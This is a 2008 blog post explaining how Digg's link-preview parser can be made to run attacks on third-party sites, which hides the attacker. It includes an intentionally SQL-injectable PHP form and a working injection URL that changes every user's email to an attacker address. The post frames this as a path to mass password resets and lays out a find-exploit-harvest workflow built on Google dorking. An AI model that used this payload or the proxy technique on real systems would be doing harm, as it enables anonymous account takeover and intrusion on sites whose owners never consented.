Making Digg Attack Sites For You

July 6th, 2008 | by blank89 |

People have hacked Digg before. This guy found an xss injection that allowed him to force users to Digg his articles. Digg happily patched the problem and went on with their business. However, there is another problem with Digg that has to do with their content parsing system. The difference is that it doesn’t compromise their system, it forces them to compromise other systems.

The problem is that users can submit urls that have attacks embedded in them. When digg parses the submission to get the title and description and images and such, the attack is executed on the server. What is the advantage to this? Being anonymous! In this case, Digg acts as a proxy, allowing you to perform an attack without ever directly connecting to the server.

If the article ended here, it wouldn’t be very exciting though, would it? I cooked up an example application and attack for you. Here is the server side source code that is vulnerable to sql injection.


<html>
<head><title>This script is vulnerable to sql injection</title></head>
<body>
<form action="sqlinjection.php" method="GET">
User: <input type="text" name="user" /><br />
Email: <input type="text" name="email" />
<input type="submit" value="Inject" />
</form>
</body>
</html>
<?php
//connect to the database
//mysql_error() will be usefull to play around with other injection examples
mysql_connect("localhost", "username", "password") or die(mysql_error());
mysql_select_db("database") or die(mysql_error());
$user = stripslashes($_GET['user']); //stipslashes for demonstration purposes (magicquotes)
$email = stripslashes($_GET['email']);
//the query that the injection is performed on
echo $query = "UPDATE users SET email='$email' WHERE user='$user'";//print the query for testing purposes
$result = mysql_query($query) or die(mysql_error());
?>

The next thing we need to do is submit an attack url to Digg. Remember, you don’t actually have to submit it all the way, just wait until the parsing screen shows up and and asks you for a title and description. At that point, the attack has already happened.

Now submit the following url to Digg:

http://www.example.com/sqlinjection.php?user=asdf%27+OR+%271%27%3D%271&email=hacked%40hacked.com

The query then becomes


UPDATE users SET email='hacked@hacked.com' WHERE user='asdf' OR '1'='1'

Submit the link to Digg

And look at the database:

The hacked database

All the email addresses are changed to hacked@hacked.com! Anyone with that email address could easily reset the passwords. Using google to find sql injection vulnerabilities, Digg to execute them and a free email account to get all the passwords, you never have to actually connect to the server to hack it.

It’s actually not fair to Digg to pretend that it’s the only system with this problem. The same trick can be done by posting a link in a forum, or using a similar article submission system. The difference is that Digg does the parsing immediately, allowing you to perform an attack in real time.